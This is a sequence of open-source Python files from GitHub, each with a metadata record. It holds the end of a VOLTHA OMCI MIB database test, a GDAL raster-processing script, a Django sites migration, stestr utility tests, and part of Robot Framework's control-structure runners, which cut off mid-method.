self.assertEqual(class_data[CLASS_ID_KEY], cls_2_data[CLASS_ID_KEY])
cl2_insts = {k: v for k, v in cls_2_data.items() if isinstance(k, int)}
self.assertEqual(len(cl2_insts), len(class_insts))
# Bad class id query
cls_no_data = self.db.query(_DEVICE_ID, class_id + 1)
self.assertTrue(isinstance(cls_no_data, dict))
self.assertEqual(len(cls_no_data), 0)
########################################
# Query with device, class, instance
inst_2_data = self.db.query(_DEVICE_ID, class_id, inst_id)
self.assertEqual(inst_data[INSTANCE_ID_KEY], inst_2_data[INSTANCE_ID_KEY])
self.assertEqual(inst_data[MODIFIED_KEY], inst_2_data[MODIFIED_KEY])
self.assertEqual(inst_data[CREATED_KEY], inst_2_data[CREATED_KEY])
inst2_attr = inst_2_data[ATTRIBUTES_KEY]
self.assertEqual(len(inst2_attr), len(inst_attributes))
# Bad instance id query
inst_no_data = self.db.query(_DEVICE_ID, class_id, inst_id + 100)
self.assertTrue(isinstance(inst_no_data, dict))
self.assertEqual(len(inst_no_data), 0)
########################################
# Attribute queries
attr_2_data = self.db.query(_DEVICE_ID, class_id, inst_id, 'vendor_id')
self.assertEqual(attr_2_data['vendor_id'], attributes['vendor_id'])
attr_3_data = self.db.query(_DEVICE_ID, class_id, inst_id, ['vendor_id'])
self.assertEqual(attr_3_data['vendor_id'], attributes['vendor_id'])
attr_4_data = self.db.query(_DEVICE_ID, class_id, inst_id, {'vendor_id'})
self.assertEqual(attr_4_data['vendor_id'], attributes['vendor_id'])
attr_no_data = self.db.query(_DEVICE_ID, class_id, inst_id, 'no_such_thing')
self.assertTrue(isinstance(attr_no_data, dict))
self.assertEqual(len(attr_no_data), 0)
# Setting an attribute to the same value does not change the modified
# timestamp; modification times are tracked at the instance level
class_id = OntG.class_id
inst_id = 0
attributes = {'vendor_id': 'ABCD'}
set_occurred = self.db.set(_DEVICE_ID, class_id, inst_id, attributes)
self.assertFalse(set_occurred)
inst_3_data = self.db.query(_DEVICE_ID, class_id, inst_id)
self.assertEqual(inst_data[MODIFIED_KEY], inst_3_data[MODIFIED_KEY])
self.assertEqual(inst_data[CREATED_KEY], inst_3_data[CREATED_KEY])
# But set to new value does
time.sleep(0.1)
attributes = {'vendor_id': 'WXYZ'}
set_occurred = self.db.set(_DEVICE_ID, class_id, inst_id, attributes)
self.assertTrue(set_occurred)
inst_4_data = self.db.query(_DEVICE_ID, class_id, inst_id)
self.assertLess(inst_3_data[MODIFIED_KEY], inst_4_data[MODIFIED_KEY])
self.assertEqual(inst_3_data[CREATED_KEY], inst_4_data[CREATED_KEY])
def test_delete_instances(self):
self.db.start()
self.db.add(_DEVICE_ID)
create_time = datetime.utcnow()
class_id = GalEthernetProfile.class_id
inst_id_1 = 0x100
inst_id_2 = 0x200
attributes = {'max_gem_payload_size': 1500}
self.db.set(_DEVICE_ID, class_id, inst_id_1, attributes)
self.db.set(_DEVICE_ID, class_id, inst_id_2, attributes)
set_time = datetime.utcnow()
time.sleep(0.1)
dev_data = self.db.query(_DEVICE_ID)
cls_data = self.db.query(_DEVICE_ID, class_id)
inst_data = {k: v for k, v in cls_data.items() if isinstance(k, int)}
self.assertEqual(len(inst_data), 2)
self.assertLessEqual(dev_data[CREATED_KEY], create_time)
self.assertLessEqual(self.db.created, create_time)
# Delete one instance
time.sleep(0.1)
del_time = datetime.utcnow()
result = self.db.delete(_DEVICE_ID, class_id, inst_id_1)
self.assertTrue(result) # True is returned only when a delete actually happened
dev_data = self.db.query(_DEVICE_ID)
cls_data = self.db.query(_DEVICE_ID, class_id)
inst_data = {k: v for k, v in cls_data.items() if isinstance(k, int)}
self.assertEqual(len(inst_data), 1)
self.assertLessEqual(dev_data[CREATED_KEY], create_time)
self.assertLessEqual(self.db.created, create_time)
# Delete remaining instance
time.sleep(0.1)
result = self.db.delete(_DEVICE_ID, class_id, inst_id_2)
self.assertTrue(result) # True is returned only when a delete actually happened
dev_data = self.db.query(_DEVICE_ID)
cls_data = {k: v for k, v in dev_data.items() if isinstance(k, int)}
self.assertEqual(len(cls_data), 0)
self.assertLessEqual(dev_data[CREATED_KEY], create_time)
# Delete returns False if the instance does not exist
self.assertFalse(self.db.delete(_DEVICE_ID, class_id, inst_id_1))
self.assertFalse(self.db.delete(_DEVICE_ID, class_id, inst_id_2))
def test_on_mib_reset_listener(self):
self.db.start()
self.db.add(_DEVICE_ID)
time.sleep(0.1)
class_id = OntG.class_id
inst_id = 0
attributes = {'vendor_id': 'ABCD'}
set_time = datetime.utcnow()
self.db.set(_DEVICE_ID, class_id, inst_id, attributes)
time.sleep(0.1)
self.db.on_mib_reset(_DEVICE_ID)
dev_data = self.db.query(_DEVICE_ID)
self.assertEqual(dev_data[DEVICE_ID_KEY], _DEVICE_ID)
self.assertLessEqual(dev_data[CREATED_KEY], set_time)
self.assertLessEqual(self.db.created, set_time)
self.assertFalse(any(isinstance(cls, int) for cls in dev_data.iterkeys()))
def test_str_field_serialization(self):
self.db.start()
self.db.add(_DEVICE_ID)
class_id = OltG.class_id
inst_id = 0
attributes = {
'olt_vendor_id': 'ABCD', # StrFixedLenField(4)
}
self.db.set(_DEVICE_ID, class_id, inst_id, attributes)
data = self.db.query(_DEVICE_ID, class_id, inst_id, attributes.keys())
self.assertTrue(all(isinstance(data[k], basestring) for k in attributes.keys()))
self.assertTrue(all(data[k] == attributes[k] for k in attributes.keys()))
def test_mac_address_ip_field_serialization(self):
self.db.start()
self.db.add(_DEVICE_ID)
class_id = IpHostConfigData.class_id
inst_id = 0
attributes = {
'mac_address': '00:01:02:03:04:05', # MACField
'ip_address': '1.2.3.4', # IPField
}
self.db.set(_DEVICE_ID, class_id, inst_id, attributes)
data = self.db.query(_DEVICE_ID, class_id, inst_id, attributes.keys())
self.assertTrue(all(isinstance(data[k], basestring) for k in attributes.keys()))
self.assertTrue(all(data[k] == attributes[k] for k in attributes.keys()))
def test_byte_and_short_field_serialization(self):
self.db.start()
self.db.add(_DEVICE_ID)
class_id = UniG.class_id
inst_id = 0
attributes = {
'administrative_state': int(1), # ByteField
'non_omci_management_identifier': int(12345) # ShortField
}
self.db.set(_DEVICE_ID, class_id, inst_id, attributes)
data = self.db.query(_DEVICE_ID, class_id, inst_id, attributes.keys())
self.assertTrue(all(isinstance(data[k], type(attributes[k])) for k in attributes.keys()))
self.assertTrue(all(data[k] == attributes[k] for k in attributes.keys()))
def test_int_field_serialization(self):
self.db.start()
self.db.add(_DEVICE_ID)
class_id = PriorityQueueG.class_id
inst_id = 0
attributes = {
'related_port': int(1234567) # IntField
}
self.db.set(_DEVICE_ID, class_id, inst_id, attributes)
data = self.db.query(_DEVICE_ID, class_id, inst_id, attributes.keys())
self.assertTrue(all(isinstance(data[k], type(attributes[k])) for k in attributes.keys()))
self.assertTrue(all(data[k] == attributes[k] for k in attributes.keys()))
def test_long_field_serialization(self):
self.db.start()
self.db.add(_DEVICE_ID)
class_id = PriorityQueueG.class_id
inst_id = 0
attributes = {
'packet_drop_queue_thresholds': int(0x1234) # LongField
}
self.db.set(_DEVICE_ID, class_id, inst_id, attributes)
data = self.db.query(_DEVICE_ID, class_id, inst_id, attributes.keys())
self.assertTrue(all(isinstance(data[k], type(attributes[k])) for k in attributes.keys()))
self.assertTrue(all(data[k] == attributes[k] for k in attributes.keys()))
def test_bit_field_serialization(self):
self.db.start()
self.db.add(_DEVICE_ID)
class_id = OntG.class_id
inst_id = 0
attributes = {
'extended_tc_layer_options': long(0x1234), # BitField(16)
}
self.db.set(_DEVICE_ID, class_id, inst_id, attributes)
data = self.db.query(_DEVICE_ID, class_id, inst_id, attributes.keys())
self.assertTrue(all(isinstance(data[k], type(attributes[k])) for k in attributes.keys()))
self.assertTrue(all(data[k] == attributes[k] for k in attributes.keys()))
def test_list_field_serialization(self):
self.db.start()
self.db.add(_DEVICE_ID)
class_id = VlanTaggingFilterData.class_id
inst_id = 0
vlan_filter_list = [0] * 12
vlan_filter_list[0] = 0x1234
attributes = {
'vlan_filter_list': vlan_filter_list, # FieldListField
'forward_operation': 0,
'number_of_entries': 1
}
self.db.set(_DEVICE_ID, class_id, inst_id, attributes)
data = self.db.query(_DEVICE_ID, class_id, inst_id, attributes.keys())
self.assertTrue(all(isinstance(data[k], type(attributes[k])) for k in attributes.keys()))
self.assertTrue(all(data[k] == attributes[k] for k in attributes.keys()))
def test_complex_json_serialization(self):
self.db.start()
self.db.add(_DEVICE_ID)
class_id = ExtendedVlanTaggingOperationConfigurationData.class_id
inst_id = 0x202
table_data = VlanTaggingOperation(
filter_outer_priority=15,
filter_inner_priority=8,
filter_inner_vid=1024,
filter_inner_tpid_de=5,
filter_ether_type=0,
treatment_tags_to_remove=1,
pad3=2,
treatment_outer_priority=15,
treatment_inner_priority=8,
treatment_inner_vid=1024,
treatment_inner_tpid_de=4
)
attributes = dict(
received_frame_vlan_tagging_operation_table=table_data
)
self.db.set(_DEVICE_ID, class_id, inst_id, attributes)
data = self.db.query(_DEVICE_ID, class_id, inst_id, attributes.keys())
table_as_dict = json.loads(table_data.to_json())
self.assertTrue(all(isinstance(data['received_frame_vlan_tagging_operation_table'][0].fields[k],
type(attributes['received_frame_vlan_tagging_operation_table'].fields[k]))
for k in attributes['received_frame_vlan_tagging_operation_table'].fields.keys()))
self.assertTrue(all(data['received_frame_vlan_tagging_operation_table'][0].fields[k] ==
attributes['received_frame_vlan_tagging_operation_table'].fields[k]
for k in attributes['received_frame_vlan_tagging_operation_table'].fields.keys()))
self.assertTrue(all(data['received_frame_vlan_tagging_operation_table'][0].fields[k] == table_as_dict[k]
for k in table_as_dict.keys()))
if __name__ == '__main__':
main()
| {
"content_hash": "45ffd94cbf3222bc4c8f07d83b7c42f5",
"timestamp": "",
"source": "github",
"line_count": 506,
"max_line_length": 113,
"avg_line_length": 39.13636363636363,
"alnum_prop": 0.6098065949603595,
"repo_name": "opencord/voltha",
"id": "cd5cadf77199d6ee76acac34c0819f9f8c6c5801",
"size": "20403",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/utests/voltha/extensions/omci/test_mib_db_dict.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "30265"
},
{
"name": "Dockerfile",
"bytes": "2881"
},
{
"name": "Go",
"bytes": "181529"
},
{
"name": "Jinja",
"bytes": "25855"
},
{
"name": "Makefile",
"bytes": "76329"
},
{
"name": "Python",
"bytes": "9758796"
},
{
"name": "RobotFramework",
"bytes": "10188"
},
{
"name": "Ruby",
"bytes": "1126"
},
{
"name": "Shell",
"bytes": "758475"
},
{
"name": "XSLT",
"bytes": "175917"
}
],
"symlink_target": ""
} |
import datetime
from osgeo import gdal
import numpy as np
def cells(array):
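"""Return a fixed 30x30 spot-check window of the raster (debug helper; not used in the main flow below)."""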
window = array[480:510, 940:970]
return window
np.set_printoptions(precision=2, linewidth=700)
path = 'C:\\Recharge_GIS\\OSG_Data\\current_use'
raster = 'aws_ras_15apr1'
aws_open = gdal.Open('{a}\\{b}.tif'.format(a=path, b=raster))
dataset = aws_open
taw = np.array(aws_open.GetRasterBand(1).ReadAsArray(), dtype=float)
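# Floor the raster at 0.001 so zero or negative (e.g. nodata) cells become a small positive value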
min_val = np.ones(taw.shape) * 0.001
taw = np.maximum(taw, min_val)
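# Drop this name's reference to the GDAL dataset; 'dataset' above still keeps the file open for the metadata reads in the output loop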
aws_open = []
path = 'C:\\Recharge_GIS\\OSG_Data\\qgis_rasters'
raster = 'aws_mm_21apr_std'
aws_st_open = gdal.Open('{a}\\{b}.tif'.format(a=path, b=raster))
taw_st = np.array(aws_st_open.GetRasterBand(1).ReadAsArray(), dtype=float)
taw_st = np.maximum(taw_st, min_val)
aws_st_open = []
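# Cell-wise maximum: keep whichever raster has the larger TAW value in each cell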
result = np.where(taw_st > taw, taw_st, taw)
outputs = [result, taw]
output_names = ['aws_mod', 'taw']
x = 0
now = datetime.datetime.now()
tag = '{}_{}_{}_{}'.format(now.month, now.day, now.hour, now.minute)
for element in outputs:
name = output_names[x]
print "Saving {a}".format(a=name)
driver = gdal.GetDriverByName('GTiff')
filename = 'C:\\Recharge_GIS\\OSG_Data\\qgis_rasters\\{a}_{b}.tif'.format(a=name, b=tag)
cols = dataset.RasterXSize
rows = dataset.RasterYSize
bands = dataset.RasterCount
band = dataset.GetRasterBand(1)
datatype = band.DataType
outDataset = driver.Create(filename, cols, rows, bands, datatype)
geoTransform = dataset.GetGeoTransform()
outDataset.SetGeoTransform(geoTransform)
proj = dataset.GetProjection()
outDataset.SetProjection(proj)
outBand = outDataset.GetRasterBand(1)
outBand.WriteArray(element, 0, 0)
outBand.FlushCache()
outDataset = None # close the output dataset so GDAL flushes it to disk
x += 1
| {
"content_hash": "e3cec5c4885c7fea69fd490b414b03cb",
"timestamp": "",
"source": "github",
"line_count": 51,
"max_line_length": 92,
"avg_line_length": 32.88235294117647,
"alnum_prop": 0.6815742397137746,
"repo_name": "NMTHydro/Recharge",
"id": "adccae767c722c21821493bc13ac54c2e9b4baac",
"size": "1678",
"binary": false,
"copies": "1",
"ref": "refs/heads/develop",
"path": "zobs/orecharge/Point_Analysis/aws_work.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "1871063"
}
],
"symlink_target": ""
} |
from __future__ import unicode_literals
import django.contrib.sites.models
from django.contrib.sites.models import _simple_domain_name_validator
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = []
operations = [
migrations.CreateModel(
name='Site',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('domain', models.CharField(max_length=100, verbose_name='domain name', validators=[_simple_domain_name_validator])),
('name', models.CharField(max_length=50, verbose_name='display name')),
],
options={
'ordering': ('domain',),
'db_table': 'django_site',
'verbose_name': 'site',
'verbose_name_plural': 'sites',
},
bases=(models.Model,),
managers=[
('objects', django.contrib.sites.models.SiteManager()),
],
),
]
| {
"content_hash": "2c3cc3fdf4ee486b5ef95991252699d1",
"timestamp": "",
"source": "github",
"line_count": 31,
"max_line_length": 133,
"avg_line_length": 35.58064516129032,
"alnum_prop": 0.543064369900272,
"repo_name": "diego-d5000/MisValesMd",
"id": "9d9be48244a47127178eea2881f25dcfe401e026",
"size": "1128",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "env/lib/python2.7/site-packages/django/contrib/sites/migrations/0001_initial.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "115465"
},
{
"name": "Groff",
"bytes": "22"
},
{
"name": "HTML",
"bytes": "1415583"
},
{
"name": "JavaScript",
"bytes": "1381588"
},
{
"name": "PowerShell",
"bytes": "8325"
},
{
"name": "Python",
"bytes": "8107650"
},
{
"name": "Shell",
"bytes": "11786"
}
],
"symlink_target": ""
} |
from stestr.tests import base
from stestr import utils
class TestUtils(base.TestCase):
def test_cleanup_test_name_defaults(self):
test_id_no_attrs = 'test.TestThing.test_thing'
test_id_with_attrs = 'test.TestThing.test_thing[attr1,attr2,att3]'
test_id_with_scenario = 'test.TestThing.test_thing(mysql)'
test_id_with_attrs_and_scenario = ('test.TestThing.test_thing[attr]'
'(mysql)')
result_no_attrs = utils.cleanup_test_name(test_id_no_attrs)
self.assertEqual(test_id_no_attrs, result_no_attrs)
result_with_attrs = utils.cleanup_test_name(test_id_with_attrs)
self.assertEqual(test_id_no_attrs, result_with_attrs)
result_with_scenario = utils.cleanup_test_name(test_id_with_scenario)
self.assertEqual(test_id_with_scenario, result_with_scenario)
result_with_attr_and_scenario = utils.cleanup_test_name(
test_id_with_attrs_and_scenario)
self.assertEqual(test_id_with_scenario, result_with_attr_and_scenario)
def test_cleanup_test_name_leave_attrs(self):
test_id_no_attrs = 'test.TestThing.test_thing'
test_id_with_attrs = 'test.TestThing.test_thing[attr1,attr2,att3]'
test_id_with_scenario = 'test.TestThing.test_thing(mysql)'
test_id_with_attrs_and_scenario = ('test.TestThing.test_thing[attr]'
'(mysql)')
result_no_attrs = utils.cleanup_test_name(test_id_no_attrs,
strip_tags=False)
self.assertEqual(test_id_no_attrs, result_no_attrs)
result_with_attrs = utils.cleanup_test_name(test_id_with_attrs,
strip_tags=False)
self.assertEqual(test_id_with_attrs, result_with_attrs)
result_with_scenario = utils.cleanup_test_name(test_id_with_scenario,
strip_tags=False)
self.assertEqual(test_id_with_scenario, result_with_scenario)
result_with_attr_and_scenario = utils.cleanup_test_name(
test_id_with_attrs_and_scenario, strip_tags=False)
self.assertEqual(test_id_with_attrs_and_scenario,
result_with_attr_and_scenario)
def test_cleanup_test_name_strip_scenario_and_attrs(self):
test_id_no_attrs = 'test.TestThing.test_thing'
test_id_with_attrs = 'test.TestThing.test_thing[attr1,attr2,att3]'
test_id_with_scenario = 'test.TestThing.test_thing(mysql)'
test_id_with_attrs_and_scenario = ('test.TestThing.test_thing[attr]'
'(mysql)')
result_no_attrs = utils.cleanup_test_name(test_id_no_attrs,
strip_scenarios=True)
self.assertEqual(test_id_no_attrs, result_no_attrs)
result_with_attrs = utils.cleanup_test_name(test_id_with_attrs,
strip_scenarios=True)
self.assertEqual(test_id_no_attrs, result_with_attrs)
result_with_scenario = utils.cleanup_test_name(test_id_with_scenario,
strip_scenarios=True)
self.assertEqual(test_id_no_attrs, result_with_scenario)
result_with_attr_and_scenario = utils.cleanup_test_name(
test_id_with_attrs_and_scenario, strip_scenarios=True)
self.assertEqual(test_id_no_attrs,
result_with_attr_and_scenario)
def test_cleanup_test_name_strip_scenario(self):
test_id_no_attrs = 'test.TestThing.test_thing'
test_id_with_attrs = 'test.TestThing.test_thing[attr1,attr2,att3]'
test_id_with_scenario = 'test.TestThing.test_thing(mysql)'
test_id_with_attrs_and_scenario = ('test.TestThing.test_thing[attr]'
'(mysql)')
result_no_attrs = utils.cleanup_test_name(test_id_no_attrs,
strip_scenarios=True,
strip_tags=False)
self.assertEqual(test_id_no_attrs, result_no_attrs)
result_with_attrs = utils.cleanup_test_name(test_id_with_attrs,
strip_scenarios=True,
strip_tags=False)
self.assertEqual(test_id_with_attrs, result_with_attrs)
result_with_scenario = utils.cleanup_test_name(test_id_with_scenario,
strip_scenarios=True,
strip_tags=False)
self.assertEqual(test_id_no_attrs, result_with_scenario)
result_with_attr_and_scenario = utils.cleanup_test_name(
test_id_with_attrs_and_scenario, strip_scenarios=True,
strip_tags=False)
self.assertEqual('test.TestThing.test_thing[attr]',
result_with_attr_and_scenario)
| {
"content_hash": "c46562c0e8613a426702852d653bfa27",
"timestamp": "",
"source": "github",
"line_count": 84,
"max_line_length": 78,
"avg_line_length": 60.226190476190474,
"alnum_prop": 0.5742241549713382,
"repo_name": "masayukig/stestr",
"id": "88618f2553859c60236fc1d9eef5cd2c70226deb",
"size": "5604",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "stestr/tests/test_utils.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "328847"
},
{
"name": "Shell",
"bytes": "93"
}
],
"symlink_target": ""
} |
from collections import OrderedDict
from contextlib import contextmanager
import re
import time
from robot.errors import (BreakLoop, ContinueLoop, DataError, ExecutionFailed,
ExecutionFailures, ExecutionPassed, ExecutionStatus)
from robot.result import (For as ForResult, While as WhileResult, If as IfResult,
IfBranch as IfBranchResult, Try as TryResult,
TryBranch as TryBranchResult)
from robot.output import librarylogger as logger
from robot.utils import (cut_assign_value, frange, get_error_message, is_string,
is_list_like, is_number, plural_or_not as s, seq2str,
split_from_equals, type_name, Matcher, timestr_to_secs)
from robot.variables import is_dict_variable, evaluate_expression
from .statusreporter import StatusReporter
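# Iteration cap applied when a WHILE loop does not specify its own 'limit'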
DEFAULT_WHILE_LIMIT = 10_000
class BodyRunner:
def __init__(self, context, run=True, templated=False):
self._context = context
self._run = run
self._templated = templated
def run(self, body):
errors = []
passed = None
for step in body:
try:
step.run(self._context, self._run, self._templated)
except ExecutionPassed as exception:
exception.set_earlier_failures(errors)
passed = exception
self._run = False
except ExecutionFailed as exception:
errors.extend(exception.get_errors())
self._run = exception.can_continue(self._context, self._templated)
if passed:
raise passed
if errors:
raise ExecutionFailures(errors)
class KeywordRunner:
def __init__(self, context, run=True):
self._context = context
self._run = run
def run(self, step, name=None):
context = self._context
runner = context.get_runner(name or step.name)
if context.dry_run:
return runner.dry_run(step, context)
return runner.run(step, context, self._run)
def ForRunner(context, flavor='IN', run=True, templated=False):
runners = {'IN': ForInRunner,
'IN RANGE': ForInRangeRunner,
'IN ZIP': ForInZipRunner,
'IN ENUMERATE': ForInEnumerateRunner}
runner = runners[flavor or 'IN']
return runner(context, run, templated)
class ForInRunner:
flavor = 'IN'
def __init__(self, context, run=True, templated=False):
self._context = context
self._run = run
self._templated = templated
def run(self, data):
result = ForResult(data.variables, data.flavor, data.values)
with StatusReporter(data, result, self._context, self._run) as status:
run_at_least_once = False
if self._run:
if data.error:
raise DataError(data.error)
run_at_least_once = self._run_loop(data, result)
if not run_at_least_once:
status.pass_status = result.NOT_RUN
self._run_one_round(data, result, run=False)
def _run_loop(self, data, result):
errors = []
executed = False
for values in self._get_values_for_rounds(data):
executed = True
try:
self._run_one_round(data, result, values)
except BreakLoop as exception:
if exception.earlier_failures:
errors.extend(exception.earlier_failures.get_errors())
break
except ContinueLoop as exception:
if exception.earlier_failures:
errors.extend(exception.earlier_failures.get_errors())
continue
except ExecutionPassed as exception:
exception.set_earlier_failures(errors)
raise exception
except ExecutionFailed as exception:
errors.extend(exception.get_errors())
if not exception.can_continue(self._context,
self._templated):
break
if errors:
raise ExecutionFailures(errors)
return executed
def _get_values_for_rounds(self, data):
if self._context.dry_run:
return [None]
values_per_round = len(data.variables)
if self._is_dict_iteration(data.values):
values = self._resolve_dict_values(data.values)
values = self._map_dict_values_to_rounds(values, values_per_round)
else:
values = self._resolve_values(data.values)
values = self._map_values_to_rounds(values, values_per_round)
return values
def _is_dict_iteration(self, values):
all_name_value = True
for item in values:
if is_dict_variable(item):
return True
if split_from_equals(item)[1] is None:
all_name_value = False
if all_name_value:
name, value = split_from_equals(values[0])
logger.warn(
"FOR loop iteration over values that are all in 'name=value' "
"format like '%s' is deprecated. In the future this syntax "
"will mean iterating over names and values separately like "
"when iterating over '&{dict} variables. Escape at least one "
"of the values like '%s\\=%s' to use normal FOR loop "
"iteration and to disable this warning."
% (values[0], name, value)
)
return False
def _resolve_dict_values(self, values):
result = OrderedDict()
replace_scalar = self._context.variables.replace_scalar
for item in values:
if is_dict_variable(item):
result.update(replace_scalar(item))
else:
key, value = split_from_equals(item)
if value is None:
raise DataError(
"Invalid FOR loop value '%s'. When iterating over "
"dictionaries, values must be '&{dict}' variables "
"or use 'key=value' syntax." % item
)
try:
result[replace_scalar(key)] = replace_scalar(value)
except TypeError:
raise DataError(
"Invalid dictionary item '%s': %s"
% (item, get_error_message())
)
return result.items()
def _map_dict_values_to_rounds(self, values, per_round):
if per_round > 2:
raise DataError(
'Number of FOR loop variables must be 1 or 2 when iterating '
'over dictionaries, got %d.' % per_round
)
return values
def _resolve_values(self, values):
return self._context.variables.replace_list(values)
def _map_values_to_rounds(self, values, per_round):
count = len(values)
if count % per_round != 0:
self._raise_wrong_variable_count(per_round, count)
# Map list of values to list of lists containing values per round.
return (values[i:i+per_round] for i in range(0, count, per_round))
def _raise_wrong_variable_count(self, variables, values):
raise DataError(
'Number of FOR loop values should be multiple of its variables. '
'Got %d variables but %d value%s.' % (variables, values, s(values))
)
def _run_one_round(self, data, result, values=None, run=True):
result = result.body.create_iteration()
if values is not None:
variables = self._context.variables
else: # Not really run (earlier failure, unexecuted IF branch, dry-run)
variables = {}
values = [''] * len(data.variables)
for name, value in self._map_variables_and_values(data.variables, values):
variables[name] = value
result.variables[name] = cut_assign_value(value)
runner = BodyRunner(self._context, run, self._templated)
with StatusReporter(data, result, self._context, run):
runner.run(data.body)
def _map_variables_and_values(self, variables, values):
if len(variables) == 1 and len(values) != 1:
return [(variables[0], tuple(values))]
return zip(variables, values)
class ForInRangeRunner(ForInRunner):
flavor = 'IN RANGE'
def _resolve_dict_values(self, values):
raise DataError(
'FOR IN RANGE loops do not support iterating over dictionaries.'
)
def _map_values_to_rounds(self, values, per_round):
if not 1 <= len(values) <= 3:
raise DataError(
'FOR IN RANGE expected 1-3 values, got %d.' % len(values)
)
try:
values = [self._to_number_with_arithmetic(v) for v in values]
except:
raise DataError(
'Converting FOR IN RANGE values failed: %s.'
% get_error_message()
)
values = frange(*values)
return ForInRunner._map_values_to_rounds(self, values, per_round)
def _to_number_with_arithmetic(self, item):
if is_number(item):
return item
number = eval(str(item), {})
if not is_number(number):
raise TypeError("Expected number, got %s." % type_name(item))
return number
class ForInZipRunner(ForInRunner):
flavor = 'IN ZIP'
_start = 0
def _resolve_dict_values(self, values):
raise DataError(
'FOR IN ZIP loops do not support iterating over dictionaries.'
)
def _map_values_to_rounds(self, values, per_round):
for item in values:
if not is_list_like(item):
raise DataError(
"FOR IN ZIP items must all be list-like, got %s '%s'."
% (type_name(item), item)
)
if len(values) % per_round != 0:
self._raise_wrong_variable_count(per_round, len(values))
return zip(*(list(item) for item in values))
class ForInEnumerateRunner(ForInRunner):
flavor = 'IN ENUMERATE'
def _resolve_dict_values(self, values):
self._start, values = self._get_start(values)
return ForInRunner._resolve_dict_values(self, values)
def _resolve_values(self, values):
self._start, values = self._get_start(values)
return ForInRunner._resolve_values(self, values)
def _get_start(self, values):
if not values[-1].startswith('start='):
return 0, values
start = self._context.variables.replace_string(values[-1][6:])
if len(values) == 1:
raise DataError('FOR loop has no loop values.')
try:
return int(start), values[:-1]
except ValueError:
raise ValueError("Invalid FOR IN ENUMERATE start value '%s'." % start)
def _map_dict_values_to_rounds(self, values, per_round):
if per_round > 3:
raise DataError(
'Number of FOR IN ENUMERATE loop variables must be 1-3 when '
'iterating over dictionaries, got %d.' % per_round
)
if per_round == 2:
return ((i, v) for i, v in enumerate(values, start=self._start))
return ((i,) + v for i, v in enumerate(values, start=self._start))
def _map_values_to_rounds(self, values, per_round):
per_round = max(per_round-1, 1)
values = ForInRunner._map_values_to_rounds(self, values, per_round)
return ([i] + v for i, v in enumerate(values, start=self._start))
def _raise_wrong_variable_count(self, variables, values):
raise DataError(
'Number of FOR IN ENUMERATE loop values should be multiple of '
'its variables (excluding the index). Got %d variables but %d '
'value%s.' % (variables, values, s(values))
)
class WhileRunner:
def __init__(self, context, run=True, templated=False):
self._context = context
self._run = run
self._templated = templated
def run(self, data):
run = self._run
executed_once = False
result = WhileResult(data.condition, data.limit)
with StatusReporter(data, result, self._context, run) as status:
if self._context.dry_run or not run:
try:
self._run_iteration(data, result, run)
except (BreakLoop, ContinueLoop):
pass
return
if data.error:
raise DataError(data.error)
limit = WhileLimit.create(data.limit, self._context.variables)
errors = []
while self._should_run(data.condition, self._context.variables) \
and limit.is_valid:
executed_once = True
try:
with limit:
self._run_iteration(data, result, run)
except BreakLoop:
break
except ContinueLoop:
continue
except ExecutionFailed as err:
errors.extend(err.get_errors())
if not err.can_continue(self._context, self._templated):
break
if not executed_once:
status.pass_status = result.NOT_RUN
self._run_iteration(data, result, run=False)
if errors:
raise ExecutionFailures(errors)
if not limit.is_valid:
raise DataError(limit.reason)
def _run_iteration(self, data, result, run):
runner = BodyRunner(self._context, run, self._templated)
with StatusReporter(data, result.body.create_iteration(), self._context, run):
runner.run(data.body)
def _should_run(self, condition, variables):
try:
condition = variables.replace_scalar(condition)
if is_string(condition):
return evaluate_expression(condition, variables.current.store)
return bool(condition)
except DataError as err:
raise DataError(f'Evaluating WHILE loop condition failed: {err}')
class IfRunner:
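# Shared (class-level) stack of IF blocks currently executing in dry run, used to detect recursion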
_dry_run_stack = []
def __init__(self, context, run=True, templated=False):
self._context = context
self._run = run
self._templated = templated
def run(self, data):
with self._dry_run_recursion_detection(data) as recursive_dry_run:
error = None
with StatusReporter(data, IfResult(), self._context, self._run):
for branch in data.body:
try:
if self._run_if_branch(branch, recursive_dry_run, data.error):
self._run = False
except ExecutionStatus as err:
error = err
self._run = False
if error:
raise error
@contextmanager
def _dry_run_recursion_detection(self, data):
dry_run = self._context.dry_run
if dry_run:
recursive_dry_run = data in self._dry_run_stack
self._dry_run_stack.append(data)
else:
recursive_dry_run = False
try:
yield recursive_dry_run
finally:
if dry_run:
self._dry_run_stack.pop()
def _run_if_branch(self, branch, recursive_dry_run=False, error=None):
context = self._context
result = IfBranchResult(branch.type, branch.condition)
if error:
run_branch = False
else:
try:
run_branch = self._should_run_branch(branch, context, recursive_dry_run)
except:
error = get_error_message()
run_branch = False
with StatusReporter(branch, result, context, run_branch):
runner = BodyRunner(context, run_branch, self._templated)
if not recursive_dry_run:
runner.run(branch.body)
if error and self._run:
raise DataError(error)
return run_branch
def _should_run_branch(self, branch, context, recursive_dry_run=False):
condition = branch.condition
variables = context.variables
if context.dry_run:
return not recursive_dry_run
if not self._run:
return False
if condition is None:
return True
try:
condition = variables.replace_scalar(condition)
if is_string(condition):
return evaluate_expression(condition, variables.current.store)
return bool(condition)
except DataError as err:
raise DataError(f'Evaluating {branch.type} condition failed: {err}')
class TryRunner:
def __init__(self, context, run=True, templated=False):
self._context = context
self._run = run
self._templated = templated
def run(self, data):
run = self._run
with StatusReporter(data, TryResult(), self._context, run):
if data.error:
self._run_invalid(data)
return False
error = self._run_try(data, run)
run_excepts_or_else = self._should_run_excepts_or_else(error, run)
if error:
error = self._run_excepts(data, error, run=run_excepts_or_else)
self._run_else(data, run=False)
else:
self._run_excepts(data, error, run=False)
error = self._run_else(data, run=run_excepts_or_else)
error = self._run_finally(data, run) or error
if error:
raise error
def _run_invalid(self, data):
error_reported = False
for branch in data.body:
result = TryBranchResult(branch.type, branch.patterns, branch.variable)
with StatusReporter(branch, result, self._context, run=False, suppress=True):
